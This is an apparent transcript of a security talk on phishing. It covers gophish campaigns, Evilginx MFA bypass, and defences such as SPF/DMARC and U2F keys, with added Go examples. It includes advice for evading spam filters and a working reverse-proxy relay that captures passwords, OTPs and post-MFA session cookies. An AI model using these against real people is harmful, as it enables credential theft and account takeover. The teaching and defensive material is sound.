
Advanced Phishing Attacks


Mahesh Bheema

June 02, 2022


Transcript

  1. About Me: Mahesh Bheema @0xmahesh
     • Lead Security Testing Engineer
     • 9+ years of experience in the infosec domain
     • Speaker & trainer at local infosec communities
     • Chapter Leader of Null Hyderabad - Open Security Community
  2. Agenda
     • Phishing and its types
     • Phishing campaigns with gophish
     • Demo - gophish
     • Issues with email delivery
     • MFA phishing with Evilginx
     • How Evilginx works
     • Demo - Evilginx
     • Identifying phishing mails
     • Protection against phishing
     • Questions
     Disclaimer: This session is purely for educational purposes. The speaker and null assume no liability and are not responsible for any misuse of this knowledge.
  3. What is Phishing
     • Phishing is the practice of sending fraudulent communications that appear to come from a reputable source and are designed to lure the victim into acting on them.
     • The goal is to steal sensitive data such as credit card or login details, or to install malware on the victim's machine.
  4. Common Types of Phishing
     • Email phishing (bulk, untargeted mail)
     • Vishing/Smishing (the same lure delivered by voice call or SMS)
     • Spear phishing (tailored to a specific person or organisation)
     • Whaling (spear phishing aimed at executives)
     • Angler phishing (fake customer-support accounts on social media)
  5. Gophish - Phishing Toolkit
     • Lets an operator run a phishing campaign against a large group of targets at once.
     • Tracks, per target, whether the email was sent, opened and the link clicked.
     • Captures credentials submitted to the landing page.
     • Reports campaign statistics and exports the results as CSV.
  6. Overcoming Common Issues with Email Delivery
     • Most newly registered domains are flagged as spam, so plan accordingly: register the domain and set up the mailbox at least 1-2 months before the campaign; domain age alone gets past some spam filters.
     • Authenticate your email with SPF, DKIM and DMARC.
     • Warm up the domain: scale up the sending volume gradually.
     • Avoid spammy words in the subject or body.
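A quick way to confirm that the SPF and DMARC half of the advice above is actually in place before a campaign goes out, written here as an added example (it is not part of the deck and not gophish code). The TXT records and domain names are constructed for the example; in practice they would come from a DNS lookup of the domain and of `_dmarc.<domain>`. DKIM is not checked because its selector record cannot be found without knowing the selector name.

```go
package main

import (
	"fmt"
	"strings"
)

// Constructed TXT records for two hypothetical sending domains; not real DNS data.
var sampleTXT = map[string]string{
	"example.test":        "v=spf1 include:_spf.mail.test -all",
	"_dmarc.example.test": "v=DMARC1; p=reject; rua=mailto:dmarc@example.test",
	"weak.test":           "v=spf1 +all",
	"_dmarc.weak.test":    "v=DMARC1; p=none",
}

// countsAsLookup reports whether an SPF term costs one of the 10 permitted DNS lookups.
func countsAsLookup(term string) bool {
	for _, p := range []string{"include:", "a:", "mx:", "exists:", "redirect=", "ptr"} {
		if strings.HasPrefix(term, p) {
			return true
		}
	}
	return term == "a" || term == "mx"
}

// LintSPF returns findings for an SPF record; an empty slice means nothing to flag.
func LintSPF(record string) []string {
	findings := []string{}
	fields := strings.Fields(record)
	if len(fields) == 0 || fields[0] != "v=spf1" {
		return append(findings, "no v=spf1 record published")
	}
	// The final "all" term decides what receivers do with hosts not listed.
	switch fields[len(fields)-1] {
	case "-all":
	case "~all":
		findings = append(findings, "~all (softfail): receivers may still accept forged mail")
	case "+all", "all":
		findings = append(findings, "+all lets any host send as this domain")
	case "?all":
		findings = append(findings, "?all (neutral) gives receivers no policy")
	default:
		findings = append(findings, "record does not end with an all term")
	}
	lookups := 0
	for _, f := range fields[1:] {
		if countsAsLookup(strings.TrimLeft(f, "+-~?")) {
			lookups++
		}
	}
	if lookups > 10 {
		findings = append(findings, "more than 10 DNS lookups: receivers return permerror")
	}
	return findings
}

// LintDMARC returns findings for a DMARC record.
func LintDMARC(record string) []string {
	tags := map[string]string{}
	for _, part := range strings.Split(record, ";") {
		if kv := strings.SplitN(strings.TrimSpace(part), "=", 2); len(kv) == 2 {
			tags[strings.TrimSpace(kv[0])] = strings.TrimSpace(kv[1])
		}
	}
	findings := []string{}
	if tags["v"] != "DMARC1" {
		return append(findings, "no v=DMARC1 record published")
	}
	switch tags["p"] {
	case "reject":
	case "quarantine":
		findings = append(findings, "p=quarantine: failing mail is spam-foldered rather than rejected")
	case "none":
		findings = append(findings, "p=none: failures are reported but never blocked")
	default:
		findings = append(findings, "missing or invalid p= tag")
	}
	if tags["rua"] == "" {
		findings = append(findings, "no rua= address: no aggregate reports will arrive")
	}
	if pct, ok := tags["pct"]; ok && pct != "100" {
		findings = append(findings, "pct="+pct+": policy applied to only part of the mail")
	}
	return findings
}

// AuditDomain lints the SPF and DMARC records of domain from the supplied TXT data.
func AuditDomain(domain string, txt map[string]string) map[string][]string {
	return map[string][]string{
		"spf":   LintSPF(txt[domain]),
		"dmarc": LintDMARC(txt["_dmarc."+domain]),
	}
}

func main() {
	for _, d := range []string{"example.test", "weak.test"} {
		fmt.Printf("%s: %v\n", d, AuditDomain(d, sampleTXT))
	}
}
```

The same checks apply from the receiving side: a domain that ends its SPF record in `+all` or publishes `p=none` is one whose mail a filter can neither authenticate nor reject, which is exactly the gap a phishing sender relies on.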
  7. Evilginx
     • Evilginx is a man-in-the-middle attack framework for phishing login credentials together with the session cookies, which in turn lets the attacker bypass 2-factor authentication. It does not matter whether the second factor is an SMS code, a mobile authenticator app or a recovery key; only origin-bound authenticators such as U2F keys are out of its reach (see slide 10).
     • With Evilginx there is no need to write your own HTML templates. Instead of serving lookalike sign-in pages, Evilginx becomes a relay between the real website and the phished user.
     • The phished user interacts with the real website while Evilginx captures all the data passing between the two parties.
  8. Logic behind MFA Phishing
     • Evilginx uses reverse proxying to relay traffic back and forth between phished users (e.g., targeted employees) and the real websites (e.g., authentication providers).
     • Sitting in the middle lets it capture the raw credentials, and the session cookie the site issues once MFA has succeeded, without the attacker cloning any pages.
     • Apart from running the server itself, most of the configuration lives in Evilginx's YAML phishlet files, which tell it per domain what to proxy, which cookies to capture and which strings to rewrite.
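The three jobs a phishlet describes (proxy the real host, harvest the credentials and the post-MFA cookie, rewrite the real hostname so the victim stays on the relay) fit in a few dozen lines of Go's `httputil.ReverseProxy`. The block below is an added example to show that mechanism; it is not Evilginx code. Both hostnames, the fake "real" login server and the victim's credentials are constructed for the demo, and the "real" site runs in-process so nothing leaves the machine.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strconv"
	"strings"
	"sync"
)

// Constructed hostnames; neither is a real site.
const (
	realHost  = "login.example.test"       // the site the victim thinks they are on
	phishHost = "login.example-login.test" // the lookalike host the relay is served from
)

// Capture records what the relay sees while forwarding traffic.
type Capture struct {
	mu      sync.Mutex
	Creds   []string // raw bodies of POSTs to the login path (username, password, OTP)
	Cookies []string // Set-Cookie headers the real site issued after a successful login
}

// NewRelay returns a reverse proxy that forwards every request to upstream and
// back, harvesting credentials and cookies on the way.
func NewRelay(upstream *url.URL, c *Capture) *httputil.ReverseProxy {
	rp := httputil.NewSingleHostReverseProxy(upstream)
	baseDirector := rp.Director
	rp.Director = func(r *http.Request) {
		baseDirector(r)
		r.Host = upstream.Host // the real site must see a Host it serves
		if r.Method == http.MethodPost && strings.HasPrefix(r.URL.Path, "/login") {
			body, _ := io.ReadAll(r.Body)
			r.Body = io.NopCloser(bytes.NewReader(body)) // put it back so the login still succeeds
			c.mu.Lock()
			c.Creds = append(c.Creds, string(body))
			c.mu.Unlock()
		}
	}
	rp.ModifyResponse = func(resp *http.Response) error {
		// Keep the real site's cookies (the session the attacker wants) and re-scope
		// the copy sent to the victim so their browser accepts it for the lookalike host.
		for i, sc := range resp.Header["Set-Cookie"] {
			c.mu.Lock()
			c.Cookies = append(c.Cookies, sc)
			c.mu.Unlock()
			resp.Header["Set-Cookie"][i] = strings.Replace(sc, "Domain="+realHost, "Domain="+phishHost, 1)
		}
		// Rewrite absolute links so later clicks also go through the relay.
		if strings.HasPrefix(resp.Header.Get("Content-Type"), "text/html") {
			body, err := io.ReadAll(resp.Body)
			if err != nil {
				return err
			}
			resp.Body.Close()
			body = bytes.ReplaceAll(body, []byte(realHost), []byte(phishHost))
			resp.Body = io.NopCloser(bytes.NewReader(body))
			resp.ContentLength = int64(len(body))
			resp.Header.Set("Content-Length", strconv.Itoa(len(body)))
		}
		return nil
	}
	return rp
}

// fakeRealSite is a constructed stand-in for the real login server: it issues a
// session cookie only once the correct password and OTP arrive.
func fakeRealSite() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/login", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "text/html")
		if r.Method != http.MethodPost {
			fmt.Fprintf(w, `<form action="https://%s/login" method="post"></form>`, realHost)
			return
		}
		r.ParseForm()
		if r.Form.Get("pass") != "hunter2" || r.Form.Get("otp") != "123456" {
			http.Error(w, "login failed", http.StatusForbidden)
			return
		}
		http.SetCookie(w, &http.Cookie{Name: "session", Value: "s3ss10n", Domain: realHost, Path: "/", HttpOnly: true})
		fmt.Fprintf(w, `<a href="https://%s/home">Continue</a>`, realHost)
	})
	return mux
}

// Demo runs the victim's login through the relay and returns what was captured,
// the Set-Cookie header the victim received, and the page body they saw.
func Demo() (*Capture, string, string, error) {
	site := httptest.NewServer(fakeRealSite())
	defer site.Close()
	upstream, _ := url.Parse(site.URL)
	c := &Capture{}
	relay := httptest.NewServer(NewRelay(upstream, c))
	defer relay.Close()
	// The victim types their real password and the current OTP into the relay.
	form := url.Values{"user": {"alice"}, "pass": {"hunter2"}, "otp": {"123456"}}
	resp, err := http.Post(relay.URL+"/login", "application/x-www-form-urlencoded", strings.NewReader(form.Encode()))
	if err != nil {
		return nil, "", "", err
	}
	defer resp.Body.Close()
	page, _ := io.ReadAll(resp.Body)
	return c, resp.Header.Get("Set-Cookie"), string(page), nil
}

func main() {
	c, cookie, page, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Println("captured:", c.Creds, c.Cookies)
	fmt.Println("victim got:", cookie, page)
}
```

The point to notice is that the relay never needs to know how the second factor works: the victim completes MFA against the real site, and the relay only has to be in the path when the resulting `Set-Cookie` comes back. Evilginx's phishlets add TLS on a lookalike certificate and many more rewrite rules, but the capture logic is this.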
  9. Recognizing a Phishing attempt
     • User education
       § Unusual sender
       § Sense of urgency or threats
       § Typos, improper grammar
       § Too good to be true
       § Unexpected hyperlinks/attachments
       § Lookalike domain names (ĸ is not really k)
     • Spam filters
  10. Protect against phishing attacks
     • User education
     • Spam filters
     • MFA / hardware keys
     • U2F (Universal 2nd Factor) devices: the U2F protocol takes the website's origin as one of the inputs to the handshake, so an assertion produced on a lookalike domain is not valid for the real site and a relay such as Evilginx cannot complete the login.
     • Microsoft Conditional Access App Control: it performs additional checks that block Evilginx, such as requiring a trusted source IP address or a domain-joined device, which the attacker's relay cannot satisfy.
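Why origin binding defeats the relay is easiest to see with the three parties written out. The block below is an added example, not code from the deck or from any U2F library: a toy token holding one P-256 key per application, a browser that always records the origin the page was really loaded from, and a relying party that checks that origin before the signature. It simplifies real U2F by leaving out the user-presence byte and counter, and the hostnames are constructed.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
)

// clientData is assembled by the browser, never by the web page. The browser fills
// in the origin the page was actually loaded from, which is what defeats a relay.
type clientData struct {
	Type      string `json:"typ"`
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// Token models a U2F authenticator: a separate key pair per application, indexed
// by the application parameter sha256(appID). Private keys never leave the token.
type Token struct{ keys map[[32]byte]*ecdsa.PrivateKey }

func NewToken() *Token { return &Token{keys: map[[32]byte]*ecdsa.PrivateKey{}} }

// Register creates a key pair bound to appID and returns the public half for the server.
func (t *Token) Register(appID string) *ecdsa.PublicKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	t.keys[sha256.Sum256([]byte(appID))] = k
	return &k.PublicKey
}

// digest is what both sides sign and verify: sha256(appParam || sha256(clientData)).
func digest(appParam [32]byte, cd []byte) []byte {
	cdHash := sha256.Sum256(cd)
	d := sha256.Sum256(append(appParam[:], cdHash[:]...))
	return d[:]
}

// Sign answers an assertion request for appID; it fails if no key was registered there.
func (t *Token) Sign(appID string, cd []byte) ([]byte, error) {
	appParam := sha256.Sum256([]byte(appID))
	k, ok := t.keys[appParam]
	if !ok {
		return nil, errors.New("token: no key registered for this origin")
	}
	return ecdsa.SignASN1(rand.Reader, k, digest(appParam, cd))
}

// RelyingParty is the server side: it knows its own origin and the user's public key.
type RelyingParty struct {
	Origin string
	pub    *ecdsa.PublicKey
}

// Verify checks the origin the browser recorded, then the signature under the
// application parameter derived from the RP's own origin.
func (rp *RelyingParty) Verify(cd, sig []byte) error {
	var parsed clientData
	if err := json.Unmarshal(cd, &parsed); err != nil {
		return err
	}
	if parsed.Origin != rp.Origin {
		return fmt.Errorf("origin %q does not match %q", parsed.Origin, rp.Origin)
	}
	if !ecdsa.VerifyASN1(rp.pub, digest(sha256.Sum256([]byte(rp.Origin)), cd), sig) {
		return errors.New("bad signature")
	}
	return nil
}

// browserAssert is the browser's part: the page at pageOrigin asks for an assertion on
// the server's challenge; the browser uses pageOrigin as appID whatever the page claims.
func browserAssert(tok *Token, pageOrigin, challenge string) ([]byte, []byte, error) {
	cd, _ := json.Marshal(clientData{Type: "navigator.id.getAssertion", Challenge: challenge, Origin: pageOrigin})
	sig, err := tok.Sign(pageOrigin, cd)
	return cd, sig, err
}

// Demo plays three logins with one token and returns the outcome of each.
func Demo() (genuine, relayed, relayRegistered error) {
	const realOrigin = "https://login.example.test"         // constructed hostnames
	const phishOrigin = "https://login.example-login.test"
	tok := NewToken()
	rp := &RelyingParty{Origin: realOrigin, pub: tok.Register(realOrigin)}

	// 1. Genuine login: page origin and RP origin agree, so the token has a key and the RP verifies.
	if cd, sig, err := browserAssert(tok, realOrigin, "challenge-1"); err != nil {
		genuine = err
	} else {
		genuine = rp.Verify(cd, sig)
	}
	// 2. Through a relay: the RP's challenge is forwarded unchanged, but the browser
	//    records the lookalike origin, and the token holds no key for it.
	if _, _, err := browserAssert(tok, phishOrigin, "challenge-2"); err != nil {
		relayed = err
	}
	// 3. Even if the token did hold a key for the lookalike origin, the RP rejects the
	//    assertion because the origin inside clientData is not its own.
	tok.Register(phishOrigin)
	if cd, sig, err := browserAssert(tok, phishOrigin, "challenge-3"); err != nil {
		relayRegistered = err
	} else {
		relayRegistered = rp.Verify(cd, sig)
	}
	return genuine, relayed, relayRegistered
}

func main() {
	g, r, s := Demo()
	fmt.Println("genuine login:", g)
	fmt.Println("via relay:", r)
	fmt.Println("via relay, relay origin registered:", s)
}
```

Contrast this with an SMS or TOTP code: that code is just a value the victim types into the relay's form, so the relay forwards it like the password. The U2F assertion is bound to the origin the browser observed, so a relay on a different hostname has nothing it can forward.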
  11. References/Credits
     • https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/
     • https://docs.getgophish.com/user-guide/
     • https://www.itgovernance.eu/blog/en/the-5-most-common-types-of-phishing-attack
     • https://thecloudtechnologist.com/2019/04/29/defending-against-evilginx2-in-office-365/
     • https://www.mailmodo.com/guides/increase-email-deliverability
     • Images are taken from Google; credit goes to the original creators.